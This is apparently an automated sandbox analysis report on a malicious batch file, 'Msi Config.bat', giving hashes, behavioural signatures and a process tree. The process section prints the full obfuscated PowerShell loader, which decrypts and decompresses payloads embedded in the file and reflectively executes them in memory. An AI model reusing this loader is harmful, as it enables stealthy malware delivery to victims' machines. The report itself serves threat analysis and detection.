Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
18-08-2024 01:08
Static task
static1
Behavioral task
behavioral1
Sample
Msi Config.bat
Resource
win7-20240708-en
windows7-x64
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
Msi Config.bat
Resource
win10v2004-20240802-en
windows10-2004-x64
11 signatures
150 seconds
General
-
Target
Msi Config.bat
-
Size
2.3MB
-
MD5
1e914a539f872fe4fd2d7da4f8e4a4b8
-
SHA1
f064a29af9f6f14da4b4e1118c9a29b59ef5f682
-
SHA256
d9a2b84c3e8cf02f3d3fb7356c6d441dc7f0ff1065049bfe45934180c6be8d05
-
SHA512
e286ff0f51d53302c3fced2dc7f4ae9dd94f698fab1532ef2a55c33b4890a610c200597c526fb8607850b2a986812cacf30bef03fa5d9c4f5f6c399c06c14edd
-
SSDEEP
49152:hrC9ycihw/wF56sLdvUrtiQU3L4stTKerWQVsk:sk
Malware Config
Signatures
-
pid Process 2344 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2344 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2344 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3032 wrote to memory of 2344 3032 cmd.exe 32 PID 3032 wrote to memory of 2344 3032 cmd.exe 32 PID 3032 wrote to memory of 2344 3032 cmd.exe 32 PID 3032 wrote to memory of 2344 3032 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Msi Config.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rn1hZDs/4U0BsBRi9y46eXfL3OCT0WAu9wBq9nT2OaA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k6ffxuXTXkacVwxnadjdNA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kZwph=New-Object System.IO.MemoryStream(,$param_var); $sOaru=New-Object System.IO.MemoryStream; $cTJdl=New-Object System.IO.Compression.GZipStream($kZwph, [IO.Compression.CompressionMode]::Decompress); $cTJdl.CopyTo($sOaru); $cTJdl.Dispose(); $kZwph.Dispose(); $sOaru.Dispose(); $sOaru.ToArray();}function execute_function($param_var,$param2_var){ $lbbAA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eBxyl=$lbbAA.EntryPoint; $eBxyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Msi Config.bat';$BsoNF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Msi Config.bat').Split([Environment]::NewLine);foreach ($TmLcO in $BsoNF) { if ($TmLcO.StartsWith(':: ')) { $JBYjA=$TmLcO.Substring(3); break; }}$payloads_var=[string[]]$JBYjA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-